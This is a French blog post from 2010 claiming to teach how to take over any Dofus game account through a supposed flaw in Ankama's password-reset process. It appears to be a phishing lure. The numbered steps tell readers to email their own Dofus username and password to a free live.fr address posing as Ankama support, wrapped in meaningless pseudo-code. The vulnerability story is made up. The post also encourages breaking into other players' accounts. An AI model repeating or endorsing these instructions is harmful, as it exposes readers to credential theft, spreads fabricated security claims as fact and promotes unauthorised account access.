Haker un compte dofus sans logiciel et tres facilement

8 novembre 2010

Aprés maintes et diverses manipulations, j’ai découvert une méthode efficace, rapide, pour hacker un compte dofus. Si vous voulez absolument comprendre comment fonctionne cette méthode lisez le paragraphe qui suit, si vous voulez directement passer à la pratique, lisez directement les instructions numérotées un peu plus bas…
—————————————————————————————-
Pour comprendre comment ça marche, je vais commencer par vous expliquer comment
fonctionne dofus, lisez tout, c’est passionnant, et ingénieux comme méthode…

Il existe des comptes priviligés sur dofus, qu’on peut qualifier de comptes admin (ou
modérateur), ce sont en effet des personnes chargées de gérer les changements de mots
de passes puisque dofus offre un service pour les mots de passes oubliés. Ces demandes
ne se font pas automatiquement, les admins (les comptes dofus privilégiés dont j’ai déjà
parlé) possédent une interface particuliére. Lorsqu’ils recoivent une demande ecrite de
remise a zero, ils examinent la situation, ils décident de vous donne un nouveau mot de
passe dans un délai de qques jours. Lorsque ces personnes valident un changement de
mot de passe, un e-mail est envoyé au serveur dofus, un email contenant l’identifiant du
compte admin et son mot de passe et le nom du compte dofus qu’il dont il veut remettre le mot de passe à zero.

Justement il existe une faille dans le systéme mis en point par Ankama, en effet il ne
vérifie pas si le nom de compte et le mot de passe envoyé avec est bien un compte
possédant les droits nécessaires, en plus clair, le serveur ne vérifie pas si le compte a
partir duquel la demande a été envoyée est bien un compte admin, il se contente juste de
vérifier si les identifiants de mail sont ceux d’un compte bien valide. Quoi? me direz vous?
Ankama sont aussi stupides? Non, parce que cette méthode est censée être sûre à mille
pour cent, vu que seul un compte admin a accés à la surface qui permet d’envoyer la
demande en question. Et vu que l’admin en question a du faire son login pour connecter
lui même sur son propre compte Ankama, les réalisateurs de Ankama ont jugé inutile de
revérifier les paramétres de login une deuxiéme fois. Cela ne ferait que ralentir le serveur
inutilement. Et même si ceci n’est pas une faille au sens propre du terme, on peut s’en
servir pour remettre a zero le mot de passe de n’importe quel compte dofus. COmment
ça? en recréant manuellement le mail qui est envoyé par les admins. J’ai passé le plus
clair de mon temps, les derniers mois, à essayer d’élaborer un plan pour pirater le mot de
passe de mon compte Ankama, celui qu’on m’a hacké il y a quelques mois.Voilà, j’ai fait
même plus que ça, puisque j’ai découvert une méthode qui marche à tous les coups,

CE DON’T VOUS AVEZ BESOINVous devez disposer :

- d’un compte dofus valide (un compte qui fonctionne bel et bien, donc si vous n’avez pas
un compte dofs valide, vous pouvez toujours demander à un ami, ou n’importe qui, juste
qqun qui posséde un compte valide de faire la manip à votre place, j’insiste bien, il faut
que le compte soit valide pour que ça marche)
- une adresse mail qui marche.
- le nom du compte de qqun d’autre : (si vous n’avez aucune idée de comment trouver un nom de compte, cliquez sur créer un nouveau compte, et metter en guise de nom de
compte, des trucs tres communs, du genre (joey, the killer, jake….) il suffit qu’il vous dient que le compte est déjà utilisé)

- heu… c’est tout… on peut faire plein de choses avec un mail

COMMENT PROCEDER

Voici la methode:

1 – envoyer un mail a l’adresse:  » Suports-Ankama-Games-Dofus@live.fr  » Vous devez passer par cette addresse, sinon vous risquez d’avoir des ennuis avec Ankama, pour des raisons de sécurité, le mailbot transferera automatiquement votre mail au serveur Ankama…)

2 – mettez sujet:  » To.FW:Add01=fcba$ mailsubject=password_reply  »
Dans le corps du message ecrivez ceci:

{scrib}
if steam$=0
packet id svs2.3
secure id v1.32
{!scrib}
id sender value= »le_nom_du_compte_que_vous_vouler_pirater »
granted.%
auto.R=0
reply pw= »le_nom_de_votre_compte_dofus »
secure2=$pw
postto=rpw
reply packet id svs2.3
secure idr v1.32
secure3= »le_mot_de_passe_de_votre_comte_dofus »
reply=ad$pw
id$.send

3 – voila vous n’avez que trois champs a changer:
« le_nom_du_compte_que_vous_vouler_pirater »
« le_nom_de_votre_compte_dofus »
« le_mot_de_passe_de_votre_comte_dofus »

4 – L’éTAPE LA PLUS IMPORTANTE :

ATTENTION : NOTEZ BIEN Les guillemets » ne sont pas a garder, il faut les suprimer,
écrivez les noms d’utilisateurs, et le mot de passe directement aprés.
Par exemple si votre compte est pierre5684
Vous devez écrire : id sender value=pierre5684

Respectez les emplacements, sinon le serveur lira que c’est une erreur. Ce ne serait pas bon que Ankama reçoive des rapports d’erreurs.
Vous recevrez sous quelques jours un mail avec un mot de passe nouveau pour le compte
que vous vouliez hacker…
J’ai mis beaucoup de mon temps et de mes compétences en hacking, à concevoir cette
méthode, ceci est a utiliser si vous avez perdu votre compte, non pas pour pirater les
comptes des autres utilisateurs a tout va !!!